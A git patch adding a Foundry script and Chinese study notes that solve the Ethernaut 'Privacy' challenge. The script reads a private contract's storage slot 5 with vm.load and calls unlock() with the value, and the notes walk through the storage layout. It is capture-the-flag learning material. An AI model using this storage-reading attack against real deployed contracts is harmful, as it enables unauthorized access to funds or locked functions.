From ef0f7810ee2463776207aeb69fb8f6b7ce99ea4e Mon Sep 17 00:00:00 2001
From: Kuan-Hao Chen <35591407+nghdavid@users.noreply.github.com>
Date: Sat, 21 Sep 2024 23:30:32 +0800
Subject: [PATCH] 2024/09/21 note

---
 Writeup/nghdavid/Ethernaut/11/11.sol | 34 ++++++++++++++++++++++++++++
 nghdavid.md                          | 10 ++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 Writeup/nghdavid/Ethernaut/11/11.sol

diff --git a/Writeup/nghdavid/Ethernaut/11/11.sol b/Writeup/nghdavid/Ethernaut/11/11.sol
new file mode 100644
index 00000000..7ebe8473
--- /dev/null
+++ b/Writeup/nghdavid/Ethernaut/11/11.sol
@@ -0,0 +1,34 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.21;
+
+import {Script, console2} from "forge-std/Script.sol";
+import {EthernautHelper} from "../setup/EthernautHelper.sol";
+
+// NOTE You can import your helper contracts & create interfaces here
+
+contract PrivacySolution is Script, EthernautHelper {
+    address constant LEVEL_ADDRESS = 0x131c3249e115491E83De375171767Af07906eA36;
+    uint256 heroPrivateKey = vm.envUint("PRIVATE_KEY");
+
+    function run() public {
+        vm.startBroadcast(heroPrivateKey);
+        // NOTE this is the address of your challenge contract
+        address challengeInstance = createInstance(LEVEL_ADDRESS);
+
+        // YOUR SOLUTION HERE
+
+        /**
+         * Understanding Solidity’s Storage Layout And How To Access State Variables In Storage Slots.
+         */
+        bytes32 key = vm.load(challengeInstance, bytes32(uint256(5)));
+        challengeInstance.call(abi.encodeWithSignature("unlock(bytes16)", bytes16(key)));
+
+
+        // SUBMIT CHALLENGE. (DON'T EDIT)
+        bool levelSuccess = submitInstance(challengeInstance);
+        require(levelSuccess, "Challenge not passed yet");
+        vm.stopBroadcast();
+
+        console2.log(successMessage(12));
+    }
+}
diff --git a/nghdavid.md b/nghdavid.md
index 01c1a3a9..e0620894 100644
--- a/nghdavid.md
+++ b/nghdavid.md
@@ -369,5 +369,15 @@ abstract contract ReentrancyGuard {
 - 首先要呼叫關卡合約的donate()，讓攻擊者的balance有值
 - 再呼叫關卡合約的withdraw()，讓重入攻擊一直重複到balance < 0
 
+### 2024.09.21
+# Ethernut第十二題
+- 這題的關鍵是要找到data[2]的值做為key
+- 但data為private varible，所以用vm.load去讀取
+- bool佔據1個byte，在storage slot 0
+- ID為uint256，佔據32byte，在storage slot 1
+- flattening、denomination、awkwardness，加起來佔據32byte，在storage slot 2
+- data的type為bytes32[]，所以每一個值會對應到一個slot
+- data[0]對應到slot3，data[1]對應到slot4，data[2]對應到slot5
+- 所以key在slot5，用vm.load(challengeInstance, bytes32(uint256(5)))就能讀取出來key
 
 <!-- Content_END -->